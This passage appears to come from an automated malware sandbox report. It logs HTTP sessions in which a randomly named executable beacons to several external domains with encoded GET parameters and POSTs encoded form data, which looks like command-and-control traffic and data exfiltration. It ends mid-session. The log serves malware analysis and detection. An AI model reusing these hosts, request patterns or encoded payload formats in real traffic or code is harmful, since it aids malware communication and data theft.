                                                                                                            Data Ascii: XOJyHZpVBuA93CMwhNxNTk5X6rMECRyxiXiQmbtPEoPFscJFTovDggtjbYguyAPJBhB77AxhBtzxqZswgKIPqD1y0hQs0JY7CMonQTGJEl4URmsRuGsvTopWbSW0M+e6eqfCN7ujNpsiQhxWzNI1FDdNQyhXVbYdimJWWoRECilaJ73xNJYgCGZXc++5TYvijbmehfeIpjNqQg3Mvth3HVIoQMz/3UWAKjnMiC3asj6voc4Nx7V
                                                                                                            Dec 12, 2024 10:22:49.573703051 CET1236INHTTP/1.1 200 OK
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Date: Thu, 12 Dec 2024 09:22:49 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                            Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:49.573735952 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                            Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            33192.168.2.2249198217.160.0.200801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:50.898576021 CET543OUTGET /8mom/?e2E=wRQ8oHXx&x4=v3XpYZPN786X74upleiKtnNLTnr+c+QwOZfu2m4ZpmP7p96MXgDDhh7sLakM2W7qG0VyTnNwFXquJXbjGrCq/za7/jRofJkRFgfW/Ij12v4wAiV6r71IBPX8JcSc HTTP/1.1
                                                                                                            Host: www.carsten.studio
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:22:52.139718056 CET1236INHTTP/1.1 200 OK
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 4545
                                                                                                            Connection: close
                                                                                                            Date: Thu, 12 Dec 2024 09:22:51 GMT
                                                                                                            Server: Apache
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:52.139734983 CET224INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                                                                            Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,6
                                                                                                            Dec 12, 2024 10:22:52.139744997 CET1236INData Raw: 32 2c 31 31 2e 38 48 37 37 2e 32 63 2e 38 2c 30 2c 31 2e 35 2e 32 2c 31 2e 35 2c 31 2e 35 76 2e 39 63 2d 2e 31 2e 36 2d 2e 32 2c 31 2e 35 2d 31 2e 36 2c 31 2e 35 4d 39 37 2e 32 2c 33 35 2e 32 48 39 35 2e 31 61 32 2e 34 36 2c 32 2e 34 36 2c 30 2c
                                                                                                            Data Ascii: 2,11.8H77.2c.8,0,1.5.2,1.5,1.5v.9c-.1.6-.2,1.5-1.6,1.5M97.2,35.2H95.1a2.46,2.46,0,0,1-2.2-.9l-6-7.6H85.8v7a1.4,1.4,0,0,1-1.5,1.6H82.8c-1.1,0-1.7-.3-1.7-1.6V13.2c0-1.4.9-1.5,1.7-1.5h6.5c3.7,0,4.7.2,6.1,1.6s1.8,3.6,1.8,6.7c0,2.9-.8,4.7-2.3,5.7a4
                                                                                                            Dec 12, 2024 10:22:52.139754057 CET1236INData Raw: 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2d 32 2e 33 2d 32 2e 33 48 33 2e 36 41 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2c 31 2e 33 2c 31 34 56 33 32 2e 37 41 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2c 33 2e 36 2c 33 35 48 32 32 2e 34 61 32
                                                                                                            Data Ascii: 6,2.26,0,0,0-2.3-2.3H3.6A2.26,2.26,0,0,0,1.3,14V32.7A2.26,2.26,0,0,0,3.6,35H22.4a2.26,2.26,0,0,0,2.3-2.3C24.8,32.7,24.9,14,24.9,14Z" transform="translate(-1.3 -2.3)"/></svg></a></div></div> <div style="color:#333;font-size
                                                                                                            Dec 12, 2024 10:22:52.139774084 CET751INData Raw: 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 66 72 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65 69 67 68
                                                                                                            Data Ascii: ding-bottom: 30px" lang="fr"><span style="font-size: 14px; color: #777; font-weight: bold;">Fran&ccedil;ais</span><br>Cette page web vient juste d&#39;&ecirc;tre activ&eacute;e. Elle n&#39;a pour l&#39;istant aucun contenu.</div> <div st


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            34192.168.2.224919913.248.169.48801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:57.440946102 CET2472OUTPOST /5p01/ HTTP/1.1
                                                                                                            Host: www.krshop.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.krshop.shop
                                                                                                            Referer: http://www.krshop.shop/5p01/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 74 43 53 7a 48 56 39 53 45 61 5a 74 63 4f 46 44 77 56 41 6e 76 50 61 33 56 38 35 6a 71 43 4c 2b 7a 4f 6a 36 53 35 5a 51 4a 36 47 4f 32 69 4d 41 73 4b 4f 67 74 6f 6f 76 77 4b 4f 6b 62 64 31 79 78 64 64 30 43 54 61 47 49 45 54 70 5a 53 70 4f 72 68 76 63 73 44 58 6d 61 56 52 4a 62 57 48 5a 4b 4b 56 65 65 30 74 35 50 47 31 45 6b 61 38 58 4e 35 6f 61 64 4d 39 32 6c 32 59 46 2f 52 2f 6d 71 73 71 68 4f 6e 51 49 75 72 6d 6f 43 44 56 77 6f 46 2f 45 31 44 57 38 5a 4d 41 4c 72 39 45 38 4a 33 78 77 4e 30 45 6f 58 66 65 53 6a 76 79 68 2f 47 74 71 46 48 70 4c 70 33 4b 58 39 6b 63 73 35 41 77 45 78 4a 4e 6d 67 6f 53 48 50 67 2f 42 78 4a 4e 7a 44 72 70 35 75 33 78 4a 4c 39 38 4d 62 4a 64 69 7a 6a 38 4a 54 38 78 4a 42 50 33 77 2f 38 4e 66 4a 77 41 58 43 5a 54 42 58 51 6e 72 47 58 67 76 2f 43 55 76 35 31 50 4d 34 45 72 2b 34 43 51 42 54 6a 4c 69 79 76 35 50 69 67 4a 68 64 34 54 71 74 47 69 46 44 2b 79 4c 48 71 46 41 76 78 7a 4c 55 63 55 37 4a 72 77 42 7a 77 52 45 76 6d 2f 69 57 61 46 6f 2b 69 69 4a 35 4a 55 [TRUNCATED]
                                                                                                            Data Ascii: x4=tCSzHV9SEaZtcOFDwVAnvPa3V85jqCL+zOj6S5ZQJ6GO2iMAsKOgtoovwKOkbd1yxdd0CTaGIETpZSpOrhvcsDXmaVRJbWHZKKVee0t5PG1Eka8XN5oadM92l2YF/R/mqsqhOnQIurmoCDVwoF/E1DW8ZMALr9E8J3xwN0EoXfeSjvyh/GtqFHpLp3KX9kcs5AwExJNmgoSHPg/BxJNzDrp5u3xJL98MbJdizj8JT8xJBP3w/8NfJwAXCZTBXQnrGXgv/CUv51PM4Er+4CQBTjLiyv5PigJhd4TqtGiFD+yLHqFAvxzLUcU7JrwBzwREvm/iWaFo+iiJ5JUzo3jvfqXjCJCwXgupIoCSuv3CXqqmN855IrEc/rgX8Zo493HXxd1EecNCFbYLUK8H6eQssJonGnc/7EVirmSXRxc3mrHLDM8vdMjTYQjpJvgz5ch5twEUnG8+dahs+/UBF7k3UEgyQSAhHtbZmddDURnp3BwkKYsFdZvU+SjFMrTEYzSZc1axqi9rA1Rb022rBf7suB+ViY6MtCdLN+tX0yIPcKgY1AE5lnKmU6BDyfdZ/KZ2sKrvy6FeL5AVcVwtkACqbEEnkUwkuGSJCpOXY7KS3mbODmF0R7TwAQLVmoyVsZun1xgvLS2et+KNMF6FKuWC69154j7KVNxF3pUrmUfh2TjtG3LMD1miyF8aVfM8SkIBSFoBoqpu58e2u7FaOvdeTTOUczMU6SyrfdMWdpaXec164S9+yuqBhbCfJUCYxUjwADGnEAVcOzUtmLJNTHtqiC1yh53wZEuSbwNgsDFnJWTdLAvPlgm4VcA1i+3SmnIMKqACKoJE0LKFUNiZdkyLT/uj5pg9DMwXB3UG/Op9fqgh8CeSZmV7vjMsRRAP6yTxsNb1u/MbnFYPa1dUZaq7LQktdoJdcIYm8TCbt+PWIQTaIsQ/AOwuQNUbIVsDTkBzy9BeKwm6gRvIbYM7+ihJ3pP7qy8XwzSzxBnECQTWy7HndDkWK [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:57.560386896 CET291OUTData Raw: 78 55 32 61 6b 62 70 55 42 36 6c 2f 68 53 4a 35 66 64 68 50 36 2b 30 38 53 6c 70 34 67 47 48 59 34 74 39 37 6b 48 67 6c 71 64 64 4e 78 69 79 4b 62 37 38 70 43 6b 78 34 7a 35 76 77 61 5a 6a 74 4a 65 33 70 55 37 4f 43 2f 59 43 6d 7a 2f 76 4e 61 71
                                                                                                            Data Ascii: xU2akbpUB6l/hSJ5fdhP6+08Slp4gGHY4t97kHglqddNxiyKb78pCkx4z5vwaZjtJe3pU7OC/YCmz/vNaq144eMVgANH6vCtHOMpZqAVVKPnw6shUFPw7URnMOFVbiPbu8iScChNJjkaByDtGNLweDXmBdvioJYh0rbo6jeh4sl0RE9F7RP2P/ROZX83mzj1YE2VPe89AfAvg9O6nxU8JMnCWLYk+DOz282hQ8+UMdM9OSpbwPM
                                                                                                            Dec 12, 2024 10:22:58.517735958 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            35192.168.2.224920013.248.169.48801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:00.166151047 CET802OUTPOST /5p01/ HTTP/1.1
                                                                                                            Host: www.krshop.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.krshop.shop
                                                                                                            Referer: http://www.krshop.shop/5p01/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 74 43 53 7a 48 56 39 53 45 61 5a 74 63 4a 52 44 32 48 6f 6e 75 76 61 33 57 38 35 6a 67 69 4c 30 7a 4f 2b 50 53 37 30 4c 4a 4c 65 4f 31 32 63 41 73 34 57 67 67 49 6f 75 6c 36 4f 67 47 74 31 64 78 64 64 6f 43 58 61 47 49 45 33 70 5a 33 31 4f 37 69 33 66 6b 54 58 7a 4f 6c 52 49 62 57 62 71 4b 4b 6f 44 65 31 31 35 50 41 64 45 6c 62 4d 58 66 4c 51 61 59 38 39 77 79 6d 59 6f 2f 52 6a 33 71 6f 47 54 4f 6d 63 49 75 35 53 6f 42 57 5a 77 76 57 48 45 36 6a 57 35 55 73 42 39 34 34 64 7a 50 45 70 76 48 69 63 39 59 50 71 39 6f 64 53 2f 6e 56 35 64 4f 6e 68 37 68 53 50 45 72 51 5a 48 68 51 3d 3d
                                                                                                            Data Ascii: x4=tCSzHV9SEaZtcJRD2Honuva3W85jgiL0zO+PS70LJLeO12cAs4WggIoul6OgGt1dxddoCXaGIE3pZ31O7i3fkTXzOlRIbWbqKKoDe115PAdElbMXfLQaY89wymYo/Rj3qoGTOmcIu5SoBWZwvWHE6jW5UsB944dzPEpvHic9YPq9odS/nV5dOnh7hSPErQZHhQ==
                                                                                                            Dec 12, 2024 10:23:01.250957966 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            36192.168.2.224920113.248.169.48801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:02.815015078 CET2472OUTPOST /5p01/ HTTP/1.1
                                                                                                            Host: www.krshop.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.krshop.shop
                                                                                                            Referer: http://www.krshop.shop/5p01/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 74 43 53 7a 48 56 39 53 45 61 5a 74 64 74 74 44 30 6d 6f 6e 6f 50 61 32 49 73 35 6a 71 43 4c 77 7a 4f 69 50 53 35 5a 51 4a 34 75 4f 32 6c 6b 41 73 61 4f 67 73 6f 6f 75 73 61 4f 6b 62 64 31 31 78 64 35 65 43 54 66 6b 49 43 58 70 5a 58 46 4f 72 68 54 63 72 44 58 6d 59 56 52 48 62 57 61 79 4b 4b 34 48 65 30 42 54 50 45 35 45 6d 6f 30 58 64 37 51 5a 58 63 39 77 79 6d 59 53 2f 52 69 53 71 73 53 4c 4f 6d 31 51 75 72 61 6f 43 7a 56 77 74 31 2f 44 38 6a 57 6c 64 4d 41 5a 72 39 41 72 4a 33 78 38 4e 77 73 43 58 66 53 53 6a 36 75 68 2f 48 74 31 4b 33 70 45 6b 58 4b 58 67 55 63 69 35 41 78 62 78 4a 4e 6d 67 72 57 48 50 77 2f 42 78 49 4e 77 48 72 70 35 77 48 78 45 46 64 34 2b 62 4a 59 7a 7a 6a 4e 30 54 72 4a 4a 41 4e 50 77 34 4d 4e 66 4d 41 42 63 43 5a 54 63 64 77 6e 4a 47 54 4d 4e 2f 44 34 2f 35 31 50 4d 34 43 2f 2b 7a 42 34 42 61 54 4c 69 76 2f 35 4f 31 77 4a 69 64 35 44 63 74 48 57 46 44 2f 61 4c 45 39 70 41 70 30 66 49 62 4d 55 2b 65 37 77 50 33 77 52 52 76 6e 53 71 57 61 4e 53 2b 68 71 4a 35 4c 4d [TRUNCATED]
                                                                                                            Data Ascii: x4=tCSzHV9SEaZtdttD0monoPa2Is5jqCLwzOiPS5ZQJ4uO2lkAsaOgsoousaOkbd11xd5eCTfkICXpZXFOrhTcrDXmYVRHbWayKK4He0BTPE5Emo0Xd7QZXc9wymYS/RiSqsSLOm1QuraoCzVwt1/D8jWldMAZr9ArJ3x8NwsCXfSSj6uh/Ht1K3pEkXKXgUci5AxbxJNmgrWHPw/BxINwHrp5wHxEFd4+bJYzzjN0TrJJANPw4MNfMABcCZTcdwnJGTMN/D4/51PM4C/+zB4BaTLiv/5O1wJid5DctHWFD/aLE9pAp0fIbMU+e7wP3wRRvnSqWaNS+hqJ5LMzk07veaXsW5C0BQytIoKsuvi3XrGmMol5e9Yfw7gV5Zoy2XGoxdwTedtCFqQLVOIHxJkj9JpOUXckh0U5rn3SRzkem+7LC88vcuLQFwjsFPhxjshRtwE6nDIEdrJs+/kBFp83UEgxbyAnJNW0mdYrUSCi3CokEo8FdYvUmijFUbSMWTTucxyhqhwQAFFbtV+rDdjsmB+Xu46PpCd8N+9X0zsfcJQY1lo5lGKmZaBH7/cH/KYPsK+uy6VOL6kVcUwtsiqqcEEimUwgqGT5CpXaY4e03nDOCGl0QOzwGwLXuIyV2puB1xYZLW6Ot7uNM0KFIOWFut16+j7Netxb3t4rmUTh2QjtHEzMHGOi0F8cb/McYEFuSFYror8p56u2vphaNqxdXjOWWTMgwyyTfdMKdoC5do165Hp+1PqC8LCSSEDHukj6ADX8EEcROAgtmLZNQ0Fqly1yh53/ZEuWbwQTsGhNJWTdKSHPlTe4f8AtnO2WinJRKqE0KoR+0K2FVZ2ZdkyEcvukt5gyDM0KB3Uk/O19fYsh9USSXl974zMsGhAQxSTwsNblu68xnBMPbF9UeYC4DAkgVIJ1XoF48T/Gt8DWInzaaO4/B+wuaNUYQFtBQUFVy8twKyf/ginIauQ74h5IspP20C8RwzeQxBvcCTCry8TndjkWP [TRUNCATED]
                                                                                                            Dec 12, 2024 10:23:02.938091993 CET1755OUTData Raw: 7a 38 32 61 68 6e 70 55 69 43 6c 2f 42 53 4f 6d 76 64 4b 50 36 2b 75 38 53 39 48 34 6b 57 58 59 35 39 39 39 47 66 67 6b 39 68 64 52 78 69 73 4b 62 37 4d 74 43 6f 41 34 7a 34 57 77 61 46 6a 74 49 79 33 70 55 62 4f 43 50 59 64 75 6a 2f 69 44 36 72
                                                                                                            Data Ascii: z82ahnpUiCl/BSOmvdKP6+u8S9H4kWXY5999Gfgk9hdRxisKb7MtCoA4z4WwaFjtIy3pUbOCPYduj/iD6r/2ofVVgAzH+nktGmMpriAC3iPmA6u4EFl6bRWnMKJVfulac0iA+KhJ6bkehyGuGNWwePvmBNzipZyhBDboKjerew6jBE/VrRG2P+8OZf43j7z1a42VJq87wfDpQ9E5nwT8JQCCWD6k+TOz2g2nws+XMdMyuSWYwPv
                                                                                                            Dec 12, 2024 10:23:03.902789116 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            37192.168.2.224920213.248.169.48801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:05.469290018 CET540OUTGET /5p01/?x4=gA6TElZrCKVvAudJqCgIj+rDW60O9S/KrsL6QppRHZfK3DYPsJvxk4hrjtesZ+QJ9tNiW026ZluxU0disiqWvA+4TRd5XHrMIpgHSW93WHtTmPUKepAYQ6lEihd3&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.krshop.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:06.585774899 CET376INHTTP/1.1 200 OK
                                                                                                            content-type: text/html
                                                                                                            date: Thu, 12 Dec 2024 09:23:06 GMT
                                                                                                            content-length: 255
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 34 3d 67 41 36 54 45 6c 5a 72 43 4b 56 76 41 75 64 4a 71 43 67 49 6a 2b 72 44 57 36 30 4f 39 53 2f 4b 72 73 4c 36 51 70 70 52 48 5a 66 4b 33 44 59 50 73 4a 76 78 6b 34 68 72 6a 74 65 73 5a 2b 51 4a 39 74 4e 69 57 30 32 36 5a 6c 75 78 55 30 64 69 73 69 71 57 76 41 2b 34 54 52 64 35 58 48 72 4d 49 70 67 48 53 57 39 33 57 48 74 54 6d 50 55 4b 65 70 41 59 51 36 6c 45 69 68 64 33 26 65 32 45 3d 77 52 51 38 6f 48 58 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x4=gA6TElZrCKVvAudJqCgIj+rDW60O9S/KrsL6QppRHZfK3DYPsJvxk4hrjtesZ+QJ9tNiW026ZluxU0disiqWvA+4TRd5XHrMIpgHSW93WHtTmPUKepAYQ6lEihd3&e2E=wRQ8oHXx"}</script></head></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            38192.168.2.224920381.2.196.19801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:12.125231981 CET2472OUTPOST /k6bb/ HTTP/1.1
                                                                                                            Host: www.rysanekbeton.cloud
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.rysanekbeton.cloud
                                                                                                            Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
